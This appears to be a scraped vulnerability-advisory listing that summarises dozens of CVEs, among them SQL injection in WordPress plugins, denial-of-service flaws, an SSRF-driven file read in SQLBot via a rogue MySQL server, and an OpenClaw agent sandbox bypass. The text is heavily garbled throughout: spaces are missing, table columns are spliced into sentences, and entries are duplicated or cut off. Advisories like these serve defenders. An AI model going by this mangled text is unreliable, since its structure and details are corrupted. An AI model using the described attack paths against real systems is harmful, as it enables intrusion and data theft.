OpenClawversionspriorto2026.2.22failtosanitizeshellstartupenvironmentvariablesHOMEandZDOTDIRinCVE-thesystem.runfunction,allowingattackerstobypasscommandallowlistprotections.Remoteattackerscaninject More2026- 7.5maliciousstartupfilessuchas.bashprofileor.zshenvtoachievearbitrarycodeexecutionbeforeallowlist- Details32056evaluatedcommandsareexecuted. OpenClawversionspriorto2026.2.25containanauthenticationhardeninggapinbrowser-originWebSocketCVE-clientsthatallowsattackerstobypassoriginchecksandauththrottlingonloopbackdeployments.Anattackercan More2026- 7.5trickauserintoopeningamaliciouswebpageandperformpasswordbrute-forceattacksagainstthegatewayto Details32025establishanauthenticatedoperatorsessionandinvokecontrol-planemethods. CVE-CEWEPHOTOSHOW6.4.3containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplication More2019-bysubmittinganexcessivelylongbuffertothepasswordfield.Attackerscanpastealargestringofrepeated 7.5 Details25552charactersintothepasswordinputduringtheuploadprocesstotriggeranapplicationcrash. TheQuentnWPpluginforWordPressisvulnerabletoSQLInjectionviathe'qntnwpaccess'cookieinallversions CVE-upto,andincluding,1.2.12.Thisisduetoinsufficientescapingontheusersuppliedparameterandlackof More2026-sufficientpreparationontheexistingSQLqueryinthe`getuseraccess()`method.Thismakesitpossiblefor 7.5 Details2468unauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexistingqueriesthatcanbeusedto extractsensitiveinformationfromthedatabase. Out-of-boundsreadinALPNparsingduetoincompletevalidation.wolfSSL5.8.4andearliercontainedanout-of- CVE-boundsreadinALPNhandlingwhenbuiltwithALPNenabled(HAVEALPN/--enable-alpn).AcraftedALPNprotocol More2026-listcouldtriggeranout-of-boundsread,leadingtoapotentialprocesscrash(denialofservice).NotethatALPNis 7.5 Details3547disabledbydefault,butisenabledforthese3rdpartycompatibilityfeatures:enable-apachehttpd,enable-bind, enable-curl,enable-haproxy,enable-hitch,enable-lighty,enable-jni,enable-nginx,enable-quic. OpenClawversionspriorto2026.3.2containadenialofservicevulnerabilityinwebhookhandlersforBlueBubblesCVE-andGoogleChatthatparserequestbodiesbeforeperformingauthenticationandsignaturevalidation. More 7.5 Unauthenticatedattackerscanexploitthisbysendingsloworoversizedrequestbodiestoexhaustparser Details32011 resourcesanddegradeserviceavailability. resourcesanddegradeserviceavailability. CVE-Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoIncorrectConversionbetweenNumericTypes Moreduetohandlingnegativeexponentsinext/jsbn2.js.Anattackercanforcethecomputationofincorrectmodular 7.5 DetailsinversesandbreaksignatureverificationbycallingmodPowwithanegativeexponent. CVE- More2026-Versionspriorto7.15.1and8.9.3containaServer-SideRequestForgery(SSRF)vulnerabilitycombinedwitha 7.5 Details29097DenialofService(DoS)conditionintheRSSFeedDashletcomponent.Versions7.15.1and8.9.3patchtheissue. Versionsofthepackagejsrsasignbefore11.1.1arevulnerabletoInfiniteloopviathebnModInversefunctioninCVE-ext/jsbn2.jswhentheBigInteger.modInverseimplementationreceiveszeroornegativeinputs,allowingan More2026- 7.5attackertohangtheprocesspermanentlybysupplyingsuchcraftedvalues(e.g.,modInverse(0,m)or Details4598modInverse(-1,m)). EasyChatServer3.1containsadenialofservicevulnerabilitythatallowsremoteattackerstocrashtheCVE-applicationbysendingoversizeddatainthemessageparameter.Attackerscanestablishasessionviathe More2019- 7.5chat.ghpendpointandthensendaPOSTrequesttobody2.ghpwithanexcessivelylargemessageparameter Details25613valuetocausetheservicetocrash. CVE-unauthenticatedattackercancausealegitimateDiscourseauthorizationpagetodisplayanattacker-controlled More2026- 7.5domain,facilitatingsocialengineeringattacksagainstusers.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2 Details33427 Discourseisanopen-sourcediscussionplatform.Priortoversions2026.3.0-latest.1,2026.2.1,and2026.1.2,usersCVE-whodonotbelongtotheallowedpolicycreationgroupscancreatefunctionalpolicyacceptancewidgetsinposts More2026- 7.5undertherightconditions.Versions2026.3.0-latest.1,2026.2.1,and2026.1.2containapatch.Asaworkaround, Details29072disablethediscourse-policypluginbydisablingthepolicy_enabledsitesetting. UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.10 through5.11.0arevulnerabletobufferoverfloworinfiniteloopthroughlargeindenthandling.ujson.dumps() crashesthePythoninterpreter(segmentationfault)whentheproductoftheindentparameterandthenested depthoftheinputexceedsINT32MAX.Itcanalsogetstuckinaninfiniteloopiftheindentisalargenegative CVE-number.Botharecausedbyanintegeroverflow/underflowwhilstcalculatinghowmuchmemorytoreservefor More2026-indentation.Andbothcanbeusedtoachievedenialofservice.Tobevulnerable,aservicemustcall 7.5 Details32875ujson.dump()/ujson.dumps()/ujson.encode()whilstgivinguntrusteduserscontrolovertheindentparameterand notrestrictthatindentationtoreasonablysmallnon-negativevalues.Aservicemayalsobevulnerabletothe infiniteloopifitusesafixednegativeindent.Anunderflowalwaysoccursforanynegativeindentwhentheinput dataisatleastonelevelnestedbut,forsmallnegativeindents,theunderflowisusuallyaccidentallyrectifiedby anotheroverflow.Thisissuehasbeenfixedinversion5.12.0. TheWPMaps–StoreLocator,GoogleMaps,OpenStreetMap,Mapbox,Listing,Directory&FilterspluginforWordPress CVE-isvulnerabletotime-basedSQLInjectionviathe‘orderby’parameterinallversionsupto,andincluding,4.9.1due More2026-toinsufficientescapingontheusersuppliedparameterandlackofsufficientpreparationontheexistingSQL 7.5 Details2580query.ThismakesitpossibleforunauthenticatedattackerstoappendadditionalSQLqueriesintoalreadyexisting queriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. UltraJSONisafastJSONencoderanddecoderwritteninpureCwithbindingsforPython3.7+.Versions5.4.0 through5.11.0containanaccumulatingmemoryleakinJSONparsinglarge(outsideoftherange[-2^63,2^64- 1])integers.TheleakedmemoryisacopyofthestringformoftheintegerplusanadditionalNULLbyte.TheleakCVE-occursirrespectiveofwhethertheintegerparsessuccessfullyorisrejectedduetohavingmorethan More2026- 7.5sys.getintmaxstrdigits()digits,meaningthatanysizedleakpermaliciousJSONcanbeachievedprovidedthat Details32874thereisnolimitontheoverallsizeofthepayload.Anyservicethatcallsujson.load()/ujson.loads()/ujson.decode() onuntrustedinputsisaffectedandvulnerabletodenialofserviceattacks.Thisissuehasbeenfixedinversion 5.12.0. OpenClawversionspriorto2026.3.1failtoenforcesandboxinheritanceduringcross-agentsessionsspawnCVE-operations,allowingsandboxedsessionstocreatechildprocessesunderunsandboxedagents.Anattackerwitha More2026- 7.5sandboxedsessioncanexploitthistospawnchildruntimeswithsandbox.modesettooff,bypassingruntime Details32048confinementrestrictions. eweisaGleamwebserver.Versions0.8.0through3.0.4containabuginthehandletrailersfunctionwhere rejectedtrailerheaders(forbiddenorundeclared)causeaninfiniteloop.Whenhandletrailersencounterssucha trailer,threecodepaths(lines520,523,526)recursewiththeoriginalbuffer(rest)insteadofadvancingpastthe CVE-rejectedheader(Buffer(headerrest,0)),causingdecoder.decodepackettore-parsethesameheaderonevery More 2026- 7.5iteration.Theresultingloophasnotimeoutorescape—theBEAMprocesspermanentlywedgesat100%CPU. Details 32873Anyapplicationthatcallsewe.read_bodyonchunkedrequestsisaffected,andthisisexploitablebyany unauthenticatedremoteclientbeforecontrolreturnstoapplicationcode,makinganapplication-levelworkaround impossible.Thisissueisfixedinversion3.0.5.
SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,theWebSocketendpoint(/ws) allowsunauthenticatedconnectionswhenspecificURLparametersareprovided(? app=siyuan&id=auth&type=auth).Thisbypass,intendedfortheloginpagetokeepthekernelalive,allowsanyCVE- Moreexternalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Details externalclient—includingmaliciouswebsitesviacross-originWebSocket—toconnectandreceiveallserver 7.5 Detailspusheventsinreal-time.Theseeventsleaksensitivedocumentmetadataincludingdocumenttitles,notebook32815 names,filepaths,andallCRUDoperationsperformedbyauthenticatedusers.Combinedwiththeabsenceof Originheadervalidation,amaliciouswebsitecansilentlyconnecttoavictim'slocalSiYuaninstanceandmonitor theirnote-takingactivity.Thisissuehasbeenfixedinversion3.6.1. CVE-OpenClawversionspriorto2026.2.22failtoconsistentlyenforceconfiguredinboundmediabytelimitsbefore More2026-bufferingremotemediaacrossmultiplechannelingestionpaths.Remoteattackerscansendoversizedmedia 7.5 Details32049payloadstotriggerelevatedmemoryusageandpotentialprocessinstability. AutoMapperisaconvention-basedobject-objectmapperin.NET.Versionspriorto15.1.1and16.1.1are CVE-vulnerabletoaDenialofService(DoS)attack.Whenmappingdeeplynestedobjectgraphs,thelibraryuses More2026-recursivemethodcallswithoutenforcingadefaultmaximumdepthlimit.Thisallowsanattackertoprovidea 7.5 Details32933speciallycraftedobjectgraphthatexhauststhethread'sstackmemory,triggeringaStackOverflowException andcausingtheentireapplicationprocesstoterminate.Versions15.1.1and16.1.1fixtheissue. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,theHLSstreamingendpoint (view/hls.php)isvulnerabletoapathtraversalattackthatallowsanunauthenticatedattackertostreamanyCVE-privateorpaidvideoontheplatform.ThevideoDirectoryGETparameterisusedintwodivergentcodepaths— More2026- 7.5oneforauthorization(whichtruncatesatthefirst/segment)andoneforfileaccess(whichpreserves.. Details33292traversalsequences)—creatingasplit-oracleconditionwhereauthorizationischeckedagainstonevideowhile contentisservedfromanother.Version26.0containsafixfortheissue. CVE-EquityPandit1.0containsaninsecureloggingvulnerabilitythatallowsattackerstocapturesensitiveuser More2019-credentialsbyaccessingdeveloperconsolelogsviaAndroidDebugBridge.Attackerscanuseadblogcattoextract 7.5 Details25605plaintextpasswordsloggedduringtheforgotpasswordfunction,exposinguseraccountcredentials. TheWPJobPortalpluginforWordPressisvulnerabletoSQLInjectionviathe'radius'parameterinallversionsupCVE-to,andincluding,2.4.8duetoinsufficientescapingontheusersuppliedparameterandlackofsufficient More2026- 7.5preparationontheexistingSQLquery.Thismakesitpossibleforunauthenticatedattackerstoappendadditional Details4306SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase. ModgnutlsisaTLSmoduleforApacheHTTPDbasedonGnuTLS.Inversionspriorto0.12.3and0.13.0,codefor clientcertificateverificationimportedthecertificatechainsentbytheclientintoafixedsize`gnutlsx509crtt x509[]arraywithoutcheckingthenumberofcertificatesislessthanorequaltothearraysize.gnutlsx509crttisatypedefforapointertoanopaqueGnuTLSstructurecreatedusingwithgnutlsx509crtinit()beforeimportingcertificatedataintoit,sonoattacker-controlleddatawaswrittenintoCVE-thestackbuffer,butwritingapointerafterthelastarrayelementgenerallytriggeredasegfault,andcould More2026- 7.5theoreticallycausestackcorruptionotherwise(notobservedinpractice).Serverconfigurationsthatdonotuse Details33307clientcertificates(GnuTLSClientVerifyignore,thedefault)arenotaffected.Theproblemhasbeenfixedin version0.12.3bycheckingthelengthoftheprovidedcertificatechainandrejectingitifitexceedsthebuffer length,andinversion0.13.0byrewritingcertificateverificationtousegnutlscertificateverifypeers(), removingtheneedforthebufferentirely.Thereisnoworkaround.Version0.12.3providestheminimalfixfor usersof0.12.xwhodonotwishtoupgradeto0.13.0yet. CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33852 CVE-IncorrectboundaryconditionsintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4699 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4697 CVE-IncorrectboundaryconditionsintheAudio/Video:WebCodecscomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details4695 CVE-IncorrectboundaryconditionsintheAudio/Video:Playbackcomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4693 Glancesisanopen-sourcesystemcross-platformmonitoringtool.TheGHSA-gh4xfix(commit5d3de60) addressedunauthenticatedconfigurationsecretsexposureonthe/api/v4/configendpointsbyintroducingasdictsecure()redaction.However,the/api/v4/argsand/api/v4/args/{item}endpointswerenotaddressedCVE- Morebythisfix.Theseendpointsreturnthecompletecommand-lineargumentsnamespaceviavars(self.args)`,which2026- 7.5 Detailsincludesthepasswordhash(salt+pbkdf2hmac),SNMPcommunitystrings,SNMPauthenticationkeys,andthe32609 configurationfilepath.WhenGlancesrunswithout--password(thedefault),theseendpointsareaccessible withoutanyauthentication.Version4.5.2providesamorecompletefix. CVE- 7.5 More Details FirefoxESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. Details CVE- More 7.5 Details Jenkins2.442through2.554(bothinclusive),LTS2.426.3throughLTS2.541.2(bothinclusive)performsoriginCVE-validationofrequestsmadethroughtheCLIWebSocketendpointbycomputingtheexpectedoriginfor More2026- 7.5comparisonusingtheHostorX-Forwarded-HostHTTPrequestheaders,makingitvulnerabletoDNSrebinding Details33002attacksthatallowbypassingoriginvalidation. CVE-Racecondition,use-after-freeintheGraphics:WebRendercomponent.ThisvulnerabilityaffectsFirefox<149, More2026- 7.5 Details4684 CVE-AzipslipvulnerabilityintheAdminimportfunctionalityofCTFdv3.8.1-18-gdb5a18c4allowsattackerstowrite More2026- 7.5arbitraryfilesoutsidetheintendeddirectoriesviasupplyingacraftedimport. Details30345 CVE-AnunauthenticatedremoteattackermaybeabletocontroltheformatstringofmessagesprocessedbytheAudit More2026- 7.5LogoftheCODESYSControlruntimesystem,potentiallyresultinginadenial‑of‑service(DoS)condition. Details3509 CVE-MissingReleaseofMemoryafterEffectiveLifetimevulnerabilityinMolotovCherryAndroid-ImageMagick7.This More2026- 7.5issueaffectsAndroid-ImageMagick7:before7.1.2-11. Details33856 CVE- More2026- 7.5 Details4706 nghttp2isanimplementationoftheHypertextTransferProtocolversion2inC.Priortoversion1.68.1,the nghttp2librarystopsreadingtheincomingdatawhenuserfacingpublicAPInghttp2_session_terminate_session CVE-ornghttp2_session_terminate_session2iscalledbytheapplication.Theymightbecalledinternallybythelibrary More2026-whenitdetectsthesituationthatissubjecttoconnectionerror.Duetothemissinginternalstatevalidation,the 7.5 Details27135librarykeepsreadingtherestofthedataafteroneofthoseAPIsiscalled.Thenreceivingamalformedframethat causesFRAMESIZEERRORcausesassertionfailure.nghttp2v1.68.1addsmissingstatevalidationtoavoid assertionfailure.Noknownworkaroundsareavailable. CVE-AnissueintheVirtualHostconfigurationhandling/parsercomponentofaaPanelv7.57.0allowsattackerstocause More2026- 7.5aRegularExpressionDenialofService(ReDoS)viaacraftedinput. Details29856 CVE-AlackofpathvalidationinaaPanelv7.57.0allowsattackerstoexecutealocalfileinclusion(LFI),leadingot More2026- 7.5sensitiveinformationexposure. Details29858 TheJetEnginepluginforWordPressisvulnerabletoSQLInjectionviathelisting_load_moreAJAXactioninall versionsupto,andincluding,3.8.6.1.Thisisduetothefiltered_queryparameterbeingexcludedfromtheHMAC CVE-signaturevalidation(allowingattacker-controlledinputtobypasssecuritychecks)combinedwiththe More2026-prepare_where_clause()methodintheSQLQueryBuildernotsanitizingthecompareoperatorbefore 7.5 Details4662concatenatingitintoSQLstatements.Thismakesitpossibleforunauthenticatedattackerstoappendadditional SQLqueriesintoalreadyexistingqueriesthatcanbeusedtoextractsensitiveinformationfromthedatabase, providedthesitehasaJetEngineListingGridwithLoadMoreenabledthatusesaSQLQueryBuilderquery. CVE-VitalsESPdevelopedbyGalaxySoftwareServiceshasaMissingAuthenticationvulnerability,allowing More2026- 7.5unauthenticatedremoteattackerstoexecutecertainfunctionstoobtainsensitiveinformation. Details4640
DNAsequencealignmentdatausingavarietyofencodingsandcompressionmethods.Whilemostalignment recordsstoreDNAsequenceandqualityvalues,theformatalsoallowsthemtoomitthisdataincertaincasesto CVE-savespace.DuetosomequirksoftheCRAMformat,itisnecessarytohandletheserecordscarefullyastheywill More 2026-actuallystoredatathatneedstobeconsumedandthendiscarded.UnfortunatelytheCONST,XPACKand 7.5 Details 31964XRLEencodingsdidnotproperlyimplementtheinterfaceneededtodothis.Tryingtodecoderecordswith omittedsequenceorqualitydatausingtheseencodingswouldresultinanattempttowritetoaNULLpointer. ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogramtocrash.Versions 1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Startinginversion1.17,in CVE-thecram-sizecommand,usedtowriteinformationabouthowwellCRAMfilesarecompressed,achecktoseeif Morethecram_decode_compression_header()wasmissing.Ifthefunctionreturnedanerror,thiscouldleadtoaNULL 7.5 Details31973pointerdereference.ExploitingthisbugcausesaNULLpointerdereference.Typicallythiswillcausetheprogram tocrash.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Thereisnoworkaroundforthisissue.
PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelowhavea CVE-cascadingout-of-boundsheapreadinpjsipmultipartparse().Afterboundarystringmatching,curptrisadvanced Morepastthedelimiterwithoutverifyingithasnotreachedthebufferend.Thisallows1-2bytesofadjacentheap 7.5 Details33069memorytoberead.AllapplicationsthatprocessincomingSIPmessageswithmultipartbodiesorSDPcontentare potentiallyaffected.Thisissueisresolvedinversion2.17. Qwikisaperformance-focusedJavaScriptframework.Versionspriorto1.19.2improperlyinferredarraysfrom dottedformfieldnamesduringFormDataparsing.Bysubmittingmixedarray-indexandobject-propertykeysfor thesamepath,anattackercouldcauseuser-controlledpropertiestobewrittenontovaluesthatapplicationcode CVE-expectedtobearrays.Whenprocessingapplication/x-www-form-urlencodedormultipart/form-datarequests, More2026-QwikCityconverteddottedfieldnames(e.g.,items.0,items.1)intonestedstructures.Ifapathwasinterpretedas 7.5 Details32701anarray,additionalattacker-suppliedkeysonthatpath—suchasitems.toString,items.push,items.valueOf,or items.length—couldaltertheresultingserver-sidevalueinunexpectedways,potentiallyleadingtorequest handlingfailures,denialofservicethroughmalformedarraystateoroversizedlengths,andtypeconfusionin downstreamcode.Thisissuewasfixedinversion1.19.2. OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,theWhatsApp POSTwebhookhandler(/notification/whatsapp/webhook)processesincomingstatusupdateeventswithoutCVE-verifyingtheMeta/WhatsAppX-Hub-Signature-256HMACsignature,allowinganyunauthenticatedattackerto More2026- 7.5sendforgedwebhookpayloadsthatmanipulatenotificationdeliverystatusrecords,suppressalerts,andcorrupt Details33143audittrails.ThecodebasealreadyimplementspropersignatureverificationforSlackwebhooks.Thisissuehas beenpatchedinversion10.0.34. SQLBotisanintelligentdataquerysystembasedonalargelanguagemodelandRAG.Versionspriorto1.7.0 containaServer-SideRequestForgery(SSRF)vulnerabilitythatallowsanattackertoretrievearbitrarysystemand applicationfilesfromtheserver.Anattackercanexploitthe/api/v1/datasource/checkendpointbyconfiguringaCVE-forgedMySQLdatasourcewithamaliciousparameterextraJdbc="local_infile=1".WhentheSQLBotbackend More2026- 7.5attemptstoverifytheconnectivityofthisdatasource,anattacker-controlledRogueMySQLserverissuesa Details32949maliciousLOADDATALOCALINFILEcommandduringtheMySQLhandshake.Thisforcesthetargetservertoread arbitraryfilesfromitslocalfilesystem(suchas/etc/passwdorconfigurationfiles)andtransmitthecontentsback totheattacker.Thisissuewasfixedinversion1.7.0. CVE-Denial-of-serviceintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More2026- 7.5 Details4704 CVE- More2026- 7.5 Details4707
9.6.0-alpha.24and8.6.47,remoteclientscancrashtheParseServerprocessbycallingacloudfunctionendpointCVE-withacraftedfunctionnamethattraversestheJavaScriptprototypechainofaregisteredcloudfunctionhandler, More2026- 7.5causingastackoverflow.Thefixinversions9.6.0-alpha.24and8.6.47restrictspropertylookupsduringcloud Details32886functionnameresolutiontoownpropertiesonly,preventingprototypechaintraversalfromstoredfunction handlers.Thereisnoknownworkaround. Glancesisanopen-sourcesystemcross-platformmonitoringtool.Priorto4.5.2,GlanceswebserverrunswithoutCVE-authenticationbydefaultwhenstartedwithglances-w,exposingRESTAPIwithsensitivesysteminformation More2026- 7.5includingprocesscommand-linescontainingcredentials(passwords,APIkeys,tokens)toanynetworkclient. Details32596 CVE-NVIDIATritonInferenceServercontainsavulnerabilityintheHTTPendpointwhereanattackermaycauseadenial More2026-ofservicebyprovidingalargecompressedpayload.Asuccessfulexploitofthisvulnerabilitymayleadtodenialof 7.5 Details24158service.
16.1.7,arequestcontainingthenext-resume:1header(correspondingwithaPPRresumerequest)wouldbuffer requestbodieswithoutconsistentlyenforcingmaxPostponedStateSizeincertainsetups.Thepreviousmitigation protectedminimal-modedeployments,butequivalentnon-minimaldeploymentsremainedvulnerabletothesame unboundedpostponedresume-bodybufferingbehavior.InapplicationsusingtheAppRouterwithPartialCVE- MorePrerenderingcapabilityenabled(viaexperimental.pprorcacheComponents),anattackercouldsendoversized2026- 7.5 Detailsnext-resumePOSTpayloadsthatwerebufferedwithoutconsistentsizeenforcementinnon-minimal27979 deployments,causingexcessivememoryusageandpotentialdenialofservice.Thisisfixedinversion16.1.7by enforcingsizelimitsacrossallpostponed-bodybufferingpathsanderroringwhenlimitsareexceeded.If upgradingisnotimmediatelypossible,blockrequestscontainingthenext-resumeheader,asthisisnevervalid tobesentfromanuntrustedclient. Next.jsisaReactframeworkforbuildingfull-stackwebapplications.Startinginversion10.0.0andpriortoversion 16.1.7,thedefaultNext.jsimageoptimizationdiskcache(/_next/image)didnothaveaconfigurableupper bound,allowingunboundedcachegrowth.Anattackercouldgeneratemanyuniqueimage-optimizationvariantsCVE-andexhaustdiskspace,causingdenialofservice.Thisisfixedinversion16.1.7byaddinganLRU-backeddisk More cachewithimages.maximumDiskCacheSize,includingevictionofleast-recently-usedentrieswhenthelimitis Details 7.5 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 exceeded.SettingmaximumDiskCacheSize:0disablesdiskcaching.Ifupgradingisnotimmediatelypossible,27980 periodicallyclean.next/cache/imagesand/orreducevariantcardinality(e.g.,tightenvaluesfor images.localPatterns,images.remotePatterns,andimages.qualities). CVE-NVIDIATritonInferenceServercontainsavulnerabilitywhereanattackermaycauseinternalstatecorruption.A More 7.5successfulexploitofthisvulnerabilitymayleadtoadenialofservice. Details33254 CVE-NVIDIATritonInferenceServerSagemakerHTTPservercontainsavulnerabilitywhereanattackermaycausean More2025- 7.5exception.Asuccessfulexploitofthisvulnerabilitymayleadtodenialofservice. Details33238 pyLoadisafreeandopen-sourcedownloadmanagerwritteninPython.Fromversion0.4.0tobeforeversion 0.5.0b3.dev97,thesetconfigvalue()APIendpointallowsuserswiththenon-adminSETTINGSpermissionto CVE-modifyanyconfigurationoptionwithoutrestriction.Thereconnect.scriptconfigoptioncontrolsafilepaththatis More2026-passeddirectlytosubprocess.run()inthethreadmanager'sreconnectlogic.ASETTINGSusercansetthistoany 7.5 Details33509executablefileonthesystem,achievingRemoteCodeExecution.Theonlyvalidationinsetconfigvalue()isa hardcodedcheckforgeneral.storagefolder—allothersecurity-criticalsettingsincludingreconnect.scriptare writablewithoutanyallowlistorpathrestriction.Thisissuehasbeenpatchedinversion0.5.0b3.dev97. Vikunjaisanopen-sourceself-hostedtaskmanagementplatform.Priortoversion2.2.2,the LinkSharing.ReadAll()methodallowslinkshareauthenticateduserstolistalllinksharesforaproject,includingCVE-theirsecrethashes.WhileLinkSharing.CanRead()correctlyblockslinkshareusersfromreadingindividual More2026- 7.5sharesviaReadOne,theReadAllWebhandlerbypassesthischeckbynevercallingCanRead().Anattacker Details33680witharead-onlylinksharecanretrievehashesforwriteoradminlinksharesonthesameprojectand authenticatewiththem,escalatingtofulladminaccess.Version2.2.2patchestheissue. DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.0,theensureSize()functionin @dicebear/converterreadthewidthandheightattributesfromtheinputSVGtodeterminetheoutput canvassizeforrasterization(PNG,JPEG,WebP,AVIF).AnattackerwhocansupplyacraftedSVGwithextremely largedimensions(e.g.width="999999999")couldforcetheservertoallocateexcessivememory,leadingto CVE-denialofservice.Thisprimarilyaffectsserver-sideapplicationsthatpassuntrustedoruser-suppliedSVGstothe More2026-converter'stoPng(),toJpeg(),toWebp(),ortoAvif()functions.Applicationsthatonlyconvertself-generated 7.5 Details29112DiceBearavatarsarenotpracticallyexploitable,butarestillrecommendedtoupgrade.Thisisfixedinversion 9.4.0.TheensureSize()functionnolongerreadsSVGattributestodetermineoutputsize.Instead,anewsize option(default:512,max:2048)controlstheoutputdimensions.Invalidvalues(NaN,negative,zero,Infinity)fall backtothedefault.Ifupgradingisnotimmediatelypossible,validateandsanitizethewidthandheight attributesofanyuntrustedSVGinputbeforepassingittotheconverter. pyasn1isagenericASN.1libraryforPython.Priorto0.6.3,thepyasn1libraryisvulnerabletoaDenialof Service(DoS)attackcausedbyuncontrolledrecursionwhendecodingASN.1datawithdeeplynestedstructures. AnattackercansupplyacraftedpayloadcontainingthousandsofnestedSEQUENCE(0x30)orSET(0x31)CVE-tagswith"IndefiniteLength"(0x80)markers.ThisforcesthedecodertorecursivelycallitselfuntilthePython More2026- 7.5interpretercrasheswithaRecursionErrororconsumesallavailablememory(OOM),crashingthehost Details30922application.ThisisadistinctvulnerabilityfromCVE-2026-23490(whichaddressedintegeroverflowsinOID decoding).ThefixforCVE-2026-23490(`MAXOIDARCCONTINUATIONOCTETS)doesnotmitigatethisrecursion issue.Version0.6.3fixesthisspecificissue. CVE-music-metadataisametadataparserforaudioandvideomediafiles.Priortoversion11.12.3,music-metadata's More2026-ASFparser(parseExtensionObject()inlib/asf/AsfParser.ts:112-158)entersaninfiniteloopwhenasub-object 7.5 Details32256insidetheASFHeaderExtensionObjecthasobjectSize=0`.Version11.12.3fixestheissue. ipmi-oeminFreeIPMIbefore1.16.17hasexploitablebufferoverflowsonresponsemessages.TheIntelligent PlatformManagementInterface(IPMI)specificationdefinesasetofinterfacesforplatformmanagement.Itis implementedbyalargenumberofhardwaremanufacturerstosupportsystemmanagement.Itismostcommonly usedforsensorreading(e.g.,CPUtemperaturesthroughtheipmi-sensorscommandwithinFreeIPMI)andremote CVE-powercontrol(theipmipowercommand).Theipmi-oemclientcommandimplementsasetofaIPMIOEM More2026-commandsforspecifichardwarevendors.Ifauserhassupportedhardware,theymaywishtousetheipmi-oem 7.5 Details33554commandtosendarequesttoaservertoretrievespecificinformation.Threesubcommandswerefoundtohave exploitablebufferoverflowsonresponsemessages.Theyare:"ipmi-oemdellget-last-post-code-getthelast POSTcodeandstringdescribingtheerroronsomeDellservers,""ipmi-oemsupermicroextra-firmware-info-get extrafirmwareinfoonSupermicroservers,"and"ipmi-oemwistronread-proprietary-string-readaproprietary stringonWistronservers." H3isaminimalH(TTP)framework.Inversionspriorto1.15.6andbetween2.0.0through2.0.1-rc.14, createEventStreamisvulnerabletoServer-SentEvents(SSE)injectionduetomissingnewlinesanitizationinCVE- MoreformatEventStreamMessage()andformatEventStreamComment().AnattackerwhocontrolsanypartofanSSE2026- 7.5 Detailsmessagefield(id,event,data,orcomment)caninjectarbitrarySSEeventstoconnectedclients.Thisissueis33128 fixedinversions1.15.6and2.0.1-rc.15. CVE-IncorrectboundaryconditionsintheGraphicscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< More 7.5 Details CVE-AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5 AnissueinFree5GCv.4.2.0andbeforeallowsaremoteattackertocauseadenialofserviceviathefunction More 7.5HandleAuthenticationFailureofthecomponentAMF Details30653 WhenthengxmailauthhttpmodulemoduleisenabledonNGINXPlusorNGINXOpenSource,undisclosedCVE-requestscancauseworkerprocessestoterminate.Thisissuemayoccurwhen(1)CRAM-MD5orAPOP More 7.5authenticationisenabled,and(2)theauthenticationserverpermitsretrybyreturningtheAuth-Waitresponse Details27651header.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)arenotevaluated. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Priortoversion1.7.1,intheCVE-downloadprofilepicturefunctionofthe/profilepictures/{foldername}/{filename}endpoint,thefoldername More2026- 7.5andfilenameparametersarenotstrictlyfiltered,whichallowsthesecretkeytobereadacrossdirectories. Details33497Version1.7.1containsapatch. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversions1.0.0through1.8.1, the`/api/v1/files/images/{flowid}/{filename}`endpointservesimagefileswithoutanyauthenticationorCVE-ownershipcheck.AnyunauthenticatedrequestwithaknownflowidandfilenamereturnstheimagewithHTTP More2026- 7.5200.Inamulti-tenantdeployment,anyattackerwhocandiscoverorguessa`flowid(UUIDscanbeleaked Details33484throughotherAPIresponses)candownloadanyuser'suploadedimageswithoutcredentials.Version1.9.0 containsapatch. DiceBearisanavatarlibraryfordesignersanddevelopers.Priortoversion9.4.2,theensureSize()functionin@dicebear/converterusedaregex-basedapproachtorewriteSVGwidth/heightattributes,cappingthemat 2048pxtopreventdenialofservice.ThissizecappingcouldbebypassedbycraftingSVGinputthatcausesthe CVE-regextomatchanon-functionaloccurrenceof
Named provisions
Related changes
Source
Classification
Who this affects
Taxonomy
Browse Categories
Get Data Privacy & Cybersecurity alerts
Weekly digest. AI-summarized, no noise.
Free. Unsubscribe anytime.
Get alerts for this source
We'll email you when CSA Alerts & Advisories (Singapore) publishes new changes.